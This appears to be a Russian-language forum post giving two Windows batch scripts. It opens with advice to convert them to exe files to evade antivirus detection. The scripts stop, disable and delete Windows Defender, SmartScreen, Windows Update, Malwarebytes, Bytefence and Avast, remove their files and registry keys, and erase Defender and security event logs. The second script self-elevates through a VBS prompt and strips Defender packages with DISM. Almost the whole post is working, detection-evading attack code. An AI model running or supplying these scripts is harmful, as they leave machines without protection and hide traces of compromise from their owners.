используй какай-нибудь конвертер из bat в exe, чтоб уменьшит детекты.
Код:
@echo off
sc stop windefend
sc config windefend start= disabled
sc delete windefend
sc stop WdNisSvc
sc config WdNisSvc start= disabled
sc delete WdNisSvc
sc stop Sense
sc config Sense start= disabled
sc delete Sense
sc stop wuauserv
sc config wuauserv start= disabled
sc stop usosvc
sc config usosvc start= disabled
sc stop WaasMedicSvc
sc config WaasMedicSvc start= disabled
sc stop SecurityHealthService
sc config SecurityHealthService start= disabled
sc delete SecurityHealthService
sc stop SDRSVC
sc config SDRSVC start= disabled
sc stop wscsvc
sc config wscsvc start= disabled
sc stop WdiServiceHost
sc config WdiServiceHost start= disabled
sc stop WdiSystemHost
sc config WdiSystemHost start= disabled
sc stop InstallService
sc config InstallService Start= disabled
sc stop VaultSvc
sc config VaultSvc start= disabled
sc stop Spooler
sc config Spooler start= disabled
sc stop LicenseManager
sc config LicenseManager start= disabled
sc stop DiagTrack
sc config DiagTrack start= disabled
taskkill /f /im smartscreen.exe
taskkill /f /im SecurityHealthService.exe
taskkill /f /im MpCopyAccelerator.exe
cd C:\
cd C:\Program Files\
RD /S /Q "Windows Defender"
RD /S /Q "Windows Defender Advanced Threat Protection"
RD /S /Q "Windows Security"
cd C:\Program Files (x86)\
RD /S /Q "Windows Defender"
cd C:\ProgramData\Microsoft
taskkill /f /im MpCopyAccelerator.exe
RD /S /Q "Windows Defender"
RD /S /Q "Windows Defender Advanced Threat Protection"
RD /S /Q "Windows Security Health"
cd C:\
cd Windows
cd system32
taskkill /f /im SecurityHealthService.exe
del /f WindowsUpdateElevatedInstaller.exe
del /f SecurityHealthSystray.exe
del /f SecurityHealthService.exe
del /f SecurityHealthHost.exe
del /f SecurityCenterBroker.dll
del /f SecurityCenterBrokerPS.dll
del /f SecurityHealthAgent.dll
del /f SecurityHealthProxyStub.dll
del /f SecurityHealthSSO.dll
del /f SmartScreenSettings.exe
del /f smartscreenps.dll
del /f smartscreen.exe
del /f Windows.Security.Integrity.dll
del /f windowsdefenderapplicationguardcsp.dll
del /f wscsvc.dll
del /f wscsvc.dll.mui
del /f wsecedit.dll
cd Winevt\Logs
del /f Microsoft-Windows-Windows Defender%4Operational.evtx
del /f Microsoft-Windows-Windows Defender%4WHC.evtx
del /f Microsoft-Windows-Security-Audit-Configuration-Client%4Operational.evtx
del /f Microsoft-Windows-Security-EnterpriseData-FileRevocationManager%4Operational.evtx
del /f Microsoft-Windows-Security-Netlogon%4Operational.evtx
cd C:\Windows\ImmersiveControlPanel
taskkill /f /im SystemSettings.exe
cd C:\Windows\SysWOW64
del /f smartscreenps.dll
cd C:\ProgramData\Microsoft\Windows\AppRepository
del /f Microsoft.Windows.SecHealthUI_10.0.19041.423_neutral__cw5n1h2txyewy.xml
cd C:\ProgramData\Microsoft\Windows\AppRepository\Packages
RD /S /Q "Microsoft.Windows.SecHealthUI_10.0.19041.423_neutral__cw5n1h2txyewy"
reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Defender" /f
reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Defender Security Center" /f
reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Security Center" /f
reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender" /f
reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Advanced Threat Protection" /f
reg delete "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows Security Health" /f
reg delete "HKEY_USERS\S-1-5-20\SOFTWARE\Microsoft\Windows Defender" /f
reg delete "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows Defender" /f
reg delete "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\WdBoot" /f
reg delete "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\WdFilter" /f
reg delete "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\WdNisDrv" /f
reg delete "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\WdNisSvc" /f
reg delete "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\wscsvc" /f
reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v SecurityHealth /f
sc delete windefend
sc delete sense
sc stop nsWscSvc
taskkill /f /im MBAMWsc.exe
sc stop MBAMService
sc config MBAMService start= disabled
sc delete MBAMService
taskkill /f /im MBAM.exe
sc stop Bytefenceservice
sc config Bytefenceservice start= disabled
sc delete Bytefenceservice
taskkill /f /im Bytefence.exe
cd C:\Program Files\
RD /S /Q "Malwarebytes"
RD /S /Q "Bytefence"
cd C:\Program Files (x86)\
RD /S /Q "Malwarebytes"
RD /S /Q "Bytefence"
cd C:\Program Files\Malwarebytes
RD /S /Q "Anti-Malware"
sc stop "avast! Tools"
sc config "avast! Tools" start= disabled
sc delete "avast! Tools"
sc stop "avast! Antivirus"
sc config "avast! Antivirus" start= disabled
msg * hui
Код:
:: Made by Hoang Hung
:: remove wd
@echo off
>nul 2>&1 "%SYSTEMROOT%\system32\cacls.exe" "%SYSTEMROOT%\system32\config\system"
if "%errorlevel%" NEQ "0" (
echo: Set UAC = CreateObject^("Shell.Application"^) > "%temp%\getadmin.vbs"
echo: UAC.ShellExecute "%~s0", "", "", "runas", 1 >> "%temp%\getadmin.vbs"
"%temp%\getadmin.vbs" & exit
)
if exist "%temp%\getadmin.vbs" del /f /q "%temp%\getadmin.vbs"
Title Remove Windows Defender
for /f "tokens=2*" %%e in ('reg query "HKEY_CLASSES_ROOT\CLSID\{5FDD51E2-A9D0-44CE-8C8D-162BA0C591A0}" /v "Version"') do set vers=%%f
if %PROCESSOR_ARCHITECTURE% EQU AMD64 (set arc=amd64) else (set arc=x86)
echo.
echo Deleting key in "Computer\HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Appx\AppxAllUserStore\InboxApplications"
reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Appx\AppxAllUserStore\InboxApplications\Microsoft.Windows.SecHealthUI_%vers%_neutral_neutral_cw5n1h2txyewy" /f >nul 2>&1
reg delete "HKEY_CLASSES_ROOT\*\shellex\ContextMenuHandlers\EPP" /f >nul 2>&1
reg delete "HKEY_CLASSES_ROOT\Directory\shellex\ContextMenuHandlers\EPP" /f >nul 2>&1
reg delete "HKEY_CLASSES_ROOT\Drive\shellex\ContextMenuHandlers\EPP" /f >nul 2>&1
set pack=(Windows-Defender-AM-Default-Definitions-Package~31bf3856ad364e35~%arc%~~%vers%,Windows-Defender-AppLayer-Group-amcore-Package~31bf3856ad364e35~%arc%~~%vers%,Windows-Defender-AppLayer-Group-onecore-Package~31bf3856ad364e35~%arc%~~%vers%,Windows-Defender-AppLayer-Group-Package~31bf3856ad364e35~%arc%~~%vers%,Windows-Defender-ApplicationGuard-Inbox-Package~31bf3856ad364e35~%arc%~~%vers%,Windows-Defender-Client-Package~31bf3856ad364e35~%arc%~~%vers%,Windows-Defender-CloudClean-Group-Package~31bf3856ad364e35~%arc%~~%vers%,Windows-Defender-Core-Group-amcore-Package~31bf3856ad364e35~%arc%~~%vers%,Windows-Defender-Core-Group-onecore-Package~31bf3856ad364e35~%arc%~~%vers%,Windows-Defender-Core-Group-Package~31bf3856ad364e35~%arc%~~%vers%,Windows-Defender-Group-Policy-Package~31bf3856ad364e35~%arc%~~%vers%,Windows-Defender-Management-Group-amcore-Package~31bf3856ad364e35~%arc%~~%vers%,Windows-Defender-Management-Group-onecore-Package~31bf3856ad364e35~%arc%~~%vers%,Windows-Defender-Management-Group-Package~31bf3856ad364e35~%arc%~~%vers%,Windows-Defender-Management-MDM-Group-Package~31bf3856ad364e35~%arc%~~%vers%,Windows-Defender-Management-Powershell-Group-Package~31bf3856ad364e35~%arc%~~%vers%,Windows-Defender-Nis-Group-Package~31bf3856ad364e35~%arc%~~%vers%,Windows-Shield-Provider-Core-Package~31bf3856ad364e35~%arc%~~%vers%)
for /d %%b in %pack% do (
echo ========================================================================
echo Deleting key in "Computer\HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Component Based Servicing\Packages\%%b\Owners"
reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Component Based Servicing\Packages\%%b\Owners" /f >nul 2>&1
)
set packremove=(Windows-Defender-AM-Default-Definitions-Package~31bf3856ad364e35~%arc%~~%vers%,Windows-Defender-AppLayer-Group-amcore-Package~31bf3856ad364e35~%arc%~~%vers%,Windows-Defender-AppLayer-Group-onecore-Package~31bf3856ad364e35~%arc%~~%vers%,Windows-Defender-AppLayer-Group-Package~31bf3856ad364e35~%arc%~~%vers%,Windows-Defender-ApplicationGuard-Inbox-Package~31bf3856ad364e35~%arc%~~%vers%,Windows-Defender-Client-Package~31bf3856ad364e35~%arc%~~%vers%,Windows-Defender-Group-Policy-Package~31bf3856ad364e35~%arc%~~%vers%,Windows-Shield-Provider-Core-Package~31bf3856ad364e35~%arc%~~%vers%)
for /d %%c in %packremove% do (
echo ========================================================================
echo Removing package %%c...
dism /online /remove-package /packagename:%%c /NoRestart
)
reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\MRT" /v DontOfferThroughWUAU /t REG_DWORD /d 1 /f >nul 2>&1
reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "SettingsPageVisibility" /t REG_SZ /d "hide:windowsdefender" /f >nul 2>&1
echo ========================================================================
pause